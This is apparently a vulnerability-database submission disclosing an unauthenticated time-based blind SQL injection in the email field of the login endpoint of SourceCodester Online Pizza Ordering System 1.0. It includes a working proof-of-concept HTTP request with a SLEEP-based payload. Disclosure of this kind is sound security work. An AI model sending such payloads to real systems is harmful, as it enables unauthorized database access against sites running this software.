| Title | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 login page SQL Injection |
|---|
| Description | A SQL Injection vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0, remote and unauthenticated attacker can exploit this vulnerability by sending crafted request. The vulnerable URI is /php-opos/admin/ajax.php?action=login2, which is the login page.The parameter 'email' is injectable.
An effective poc is below
POST /php-opos/admin/ajax.php?action=login2 HTTP/1.1
*************************************
email=abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl&password=def
which is a time-based blind injection and the server will response in 5s. |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/17/2023 07:47 (3 years ago) |
|---|
| Moderation | 03/17/2023 07:58 (12 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223300 [SourceCodester Online Pizza Ordering System 1.0 Login Page ajax.php?action=login2 email sql injection] |
|---|
| Points | 20 |
|---|